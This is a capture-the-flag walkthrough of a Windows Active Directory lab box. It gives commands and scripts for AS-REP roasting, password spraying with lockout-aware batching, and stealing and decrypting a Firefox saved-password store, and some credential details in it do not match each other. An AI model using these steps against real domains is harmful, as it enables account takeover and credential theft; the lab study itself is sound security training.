Premise

In this video walkthrough, we went over a Windows Active Directory lab and demonstrated user enumeration, AS-REP roasting, password spraying and, finally, privilege escalation by decrypting a Firefox profile to recover saved passwords.

Machine Name: Dictionary

Difficulty: Medium

Skills Learned

  • Kerbrute user enumeration
  • AS-REP Roasting (GetNPUsers.py)
  • Password Spraying
  • Firefox saved-password retrieval

Finding the First Foothold

My first step was to find a valid user on the domain. I started with nmap’s krb5-enum-users script and kerbrute, both of which ask the KDC about candidate usernames from a wordlist and report the ones that exist. Initially, I only found one user: “isabel“.

With a username in hand, I tried AS-REP roasting. Impacket’s GetNPUsers.py asks the KDC for an AS-REP on behalf of “isabel”; if the account has Kerberos pre-authentication disabled, the KDC answers without any proof of the password, and part of that reply is encrypted with a key derived from the user’s password. I was in luck! I got a hash that I could try to crack offline. (This is distinct from Kerberoasting, which requests service tickets for SPN accounts and needs a valid domain credential first.)

I then used the password cracking tool john with the rockyou wordlist to crack the hash. It didn’t take long to find the password: “june2013“.

However, when I tried to log in as “isabel” with this password, it didn’t work. This meant I had to dig a little deeper.

Expanding My Attack Surface

I went back to enumerating users, but this time I used rpcclient over SMB (its enumdomusers command lists the domain’s accounts). This gave me a lot more information, and I was able to find several other users, including “backupisabel“.

Now, here’s where I had a bit of an “aha!” moment. The machine was named “Dictionary,” and the password I found was “june2013”. I had a hunch that other passwords might follow the same “monthyear” pattern.

To test this theory, I created a custom wordlist of passwords that followed this pattern, every month from January 2000 through December 2019. Because “june2013” was all lower-case but other users might capitalise the month, the list has to cover both casings. Then, I used crackmapexec to try all of these passwords against the list of users I had found.

It worked! I found that the user “backupisabel” had the password “October2019“ (capital O; the lower-case form does not match). With these new credentials, I was able to log in to the machine over WinRM.
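The month-year list described above, as an added example that is not part of the original walkthrough: it emits the lower-case form that cracked (“june2013”) and the capitalised form that authenticated (“October2019”) for every month in the range, and, as an extra assumed variant the write-up did not try, two-digit years. It also splits the candidates into batches of lockout threshold minus one, the practitioner’s check before spraying a domain: the threshold itself comes from the domain password policy (crackmapexec’s `--pass-pol` prints it), and the value 5 below is only an assumption for the demonstration.

```python
# Added example: generate the "monthyear" spray list and size the batches to the lockout policy.

MONTHS = ["january", "february", "march", "april", "may", "june",
          "july", "august", "september", "october", "november", "december"]


def month_year_candidates(start_year=2000, end_year=2019):
    """Return every month+year string in the range, in both casings seen on this box.

    'june2013' (lower-case) cracked offline and 'October2019' (capitalised) logged in,
    so both casings are emitted. The two-digit year form ('june13') is an assumed
    extra variant, not something the walkthrough used.
    """
    out = []
    for year in range(start_year, end_year + 1):
        for month in MONTHS:
            for m in (month, month.capitalize()):
                out.append(f"{m}{year}")            # june2013 / October2019
                out.append(f"{m}{year % 100:02d}")  # june13  / October19 (assumed)
    return list(dict.fromkeys(out))  # drop any duplicates, keep order


def spray_batches(candidates, lockout_threshold):
    """Split candidates into batches that can each be tried once per lockout window.

    Assumes the domain policy counts every failed password per account and resets the
    counter after the observation window; keeping each batch at threshold-1 attempts
    leaves one failed logon of headroom for the real user. A threshold of 0 means
    lockout is disabled, so everything goes in one batch.
    """
    candidates = list(candidates)
    if lockout_threshold == 0:
        return [candidates]
    if lockout_threshold < 2:
        raise ValueError("lockout threshold of 1 leaves no safe spray budget")
    size = lockout_threshold - 1
    return [candidates[i:i + size] for i in range(0, len(candidates), size)]


def write_wordlist(path, candidates):
    """Write one candidate per line, the format crackmapexec's -p expects."""
    with open(path, "w") as fh:
        fh.write("\n".join(candidates) + "\n")


if __name__ == "__main__":
    cands = month_year_candidates()
    batches = spray_batches(cands, lockout_threshold=5)  # assumed policy value
    print(f"{len(cands)} candidates in {len(batches)} batches of at most {len(batches[0])}")
    write_wordlist("pass.txt", cands)
```

Feed each batch to crackmapexec as its own pass.txt, wait out the observation window between batches, and add `--continue-on-success` so the run does not stop at the first valid pair (without it, the hit on backupisabel would have hidden any later ones).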

From User to Administrator

Now that I was in, I needed to find a way to become the administrator. I ran a script called winpeas.exe, which scans the system for potential ways to escalate privileges.

winpeas pointed me to a very interesting find: a Firefox profile with a saved-password database. I navigated to the Firefox profile directory on the remote machine and downloaded key4.db, logins.json, cert9.db and cookies.sqlite. Only the first two are needed to recover saved passwords: key4.db holds the (master-password-protected) key and logins.json holds the credentials encrypted with it; cert9.db and cookies.sqlite are useful for session cookies and certificates but play no part in the decryption.

Back on my own machine, I used a Python tool called firefox_decrypt to extract the passwords from these files. This gave me a list of saved passwords, and one of them looked like it might be for the administrator account.
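Before shipping the profile to firefox_decrypt it is worth confirming that logins.json actually contains entries and that they are in the form the key in key4.db can open. The following is an added example, not code from the walkthrough or from firefox_decrypt: it unpacks the DER envelope NSS wraps around each encryptedPassword (key id, cipher OID, IV, ciphertext) and reports, per saved login, the site and the cipher. A cipher OID of 1.2.840.113549.3.7 (des-ede3-cbc) is the normal case and means the 3DES key stored in key4.db’s nssPrivate table is all that is needed. The logins.json sample and the encrypted blob inside it are constructed here for the demonstration, and the hostname in it is an assumption.

```python
# Added example: triage a downloaded Firefox logins.json without decrypting anything.
import base64
import json
from datetime import datetime, timezone

DES_EDE3_CBC = "1.2.840.113549.3.7"  # cipher NSS's Secret Decoder Ring uses for saved logins


def _der_tlv(buf, pos):
    """Parse one DER tag/length/value at pos; returns (tag, value, position after it)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _der_oid(value):
    """Decode a DER OID body (base-128 arcs) into dotted form."""
    parts = [str(value[0] // 40), str(value[0] % 40)]
    acc = 0
    for b in value[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(str(acc))
            acc = 0
    return ".".join(parts)


def parse_sdr_blob(b64):
    """Unpack an NSS SDR blob:
    SEQUENCE { keyId OCTET STRING, SEQUENCE { cipher OID, iv OCTET STRING }, ciphertext OCTET STRING }"""
    raw = base64.b64decode(b64)
    tag, body, _ = _der_tlv(raw, 0)
    if tag != 0x30:
        raise ValueError("encryptedPassword is not a DER SEQUENCE")
    _, key_id, pos = _der_tlv(body, 0)
    _, algo, pos = _der_tlv(body, pos)
    _, ciphertext, _ = _der_tlv(body, pos)
    _, oid, pos = _der_tlv(algo, 0)
    _, iv, _ = _der_tlv(algo, pos)
    return {"key_id": key_id.hex(), "cipher_oid": _der_oid(oid),
            "iv": iv.hex(), "ciphertext_len": len(ciphertext)}


def triage_logins(logins_json_text):
    """One row per saved login: where it is for, how it is encrypted, when it was last used."""
    rows = []
    for entry in json.loads(logins_json_text).get("logins", []):
        blob = parse_sdr_blob(entry["encryptedPassword"])
        last_used = datetime.fromtimestamp(entry.get("timeLastUsed", 0) / 1000, tz=timezone.utc)
        rows.append({
            "hostname": entry.get("hostname"),
            "form_url": entry.get("formSubmitURL"),
            "enc_type": entry.get("encType"),              # 1 = SDR-encrypted, 0 = legacy plaintext
            "cipher": blob["cipher_oid"],
            "decryptable_with_key4": blob["cipher_oid"] == DES_EDE3_CBC,
            "key_id": blob["key_id"],                      # matches the key row in key4.db's nssPrivate
            "last_used": last_used.strftime("%Y-%m-%d"),
        })
    return rows


def _constructed_blob():
    """Constructed SDR blob with the layout Firefox writes (3DES-CBC, 8-byte IV); not real ciphertext."""
    key_id = bytes.fromhex("f8000000000000000000000000000001")
    oid = bytes.fromhex("2a864886f70d0307")  # 1.2.840.113549.3.7
    iv, ct = bytes(range(8)), bytes(16)
    algo = b"\x06" + bytes([len(oid)]) + oid + b"\x04" + bytes([len(iv)]) + iv
    body = (b"\x04" + bytes([len(key_id)]) + key_id
            + b"\x30" + bytes([len(algo)]) + algo
            + b"\x04" + bytes([len(ct)]) + ct)
    return base64.b64encode(b"\x30" + bytes([len(body)]) + body).decode()


# Constructed sample logins.json; the hostname is an assumption for the demonstration.
SAMPLE_LOGINS_JSON = json.dumps({"nextId": 2, "version": 3, "logins": [{
    "id": 1, "hostname": "http://dictionary.htb", "httpRealm": None,
    "formSubmitURL": "http://dictionary.htb", "usernameField": "user", "passwordField": "pass",
    "encryptedUsername": _constructed_blob(), "encryptedPassword": _constructed_blob(),
    "guid": "{constructed}", "encType": 1, "timeCreated": 1572566400000,
    "timeLastUsed": 1572566400000, "timePasswordChanged": 1572566400000, "timesUsed": 1}]})

if __name__ == "__main__":
    for row in triage_logins(SAMPLE_LOGINS_JSON):
        print(row)
```

Usernames are wrapped the same way as passwords (encryptedUsername), so this pass only tells you which sites have entries; with key4.db alongside, firefox_decrypt performs the actual decryption, prompting for the master password if one was set.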

I used crackmapexec again to test these new passwords against the “administrator” account, and I found the correct one. With the administrator’s password in hand, I was able to log in and complete the challenge.

Technical Commands Used

Here’s a list of the commands I used to compromise this machine:

  • User Enumeration:
    • sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=dictionary.htb,userdb=/usr/share/wordlists/seclists/Usernames/names.txt 172.31.3.4
    • ./kerbrute userenum --dc 172.31.3.4 /usr/share/wordlists/seclists/Usernames/names.txt
    • sudo nmap -sV --script ldap-search 172.31.3.4
    • sudo rpcclient 172.31.3.4 -U isabel%getmein
    • querydominfo
  • Password Cracking and Authentication:
    • getnpusers.py -usersfile users.txt dictionary.htb
    • john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
    • crackmapexec smb 172.31.3.4 -u users.txt -p pass.txt
  • Privilege Escalation and Data Exfiltration:
    • sudo evil-winrm -i 172.31.3.4 -u backupisabel -p 'October2019'
    • sudo evil-winrm -i 172.31.3.4 -u administrator -p 'P@$$w0rd'
    • whoami /priv
    • whoami /all
    • cd Documents
    • cd AppData
    • cd Roaming
    • cd Mozilla
    • cd Firefox
    • cd Profiles
    • dir
    • download key4.db
    • download logins.json
    • download cert9.db
    • download cookies.sqlite
    • sudo mv key4.db cert9.db cookies.sqlite logins.json firefox_ps
    • cd firefox_ps
    • git clone https://github.com/unode/firefox_decrypt.git
    • cd firefox_decrypt
    • sudo python3 firefox_decrypt.py -p /home/kali/firefox_ps

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
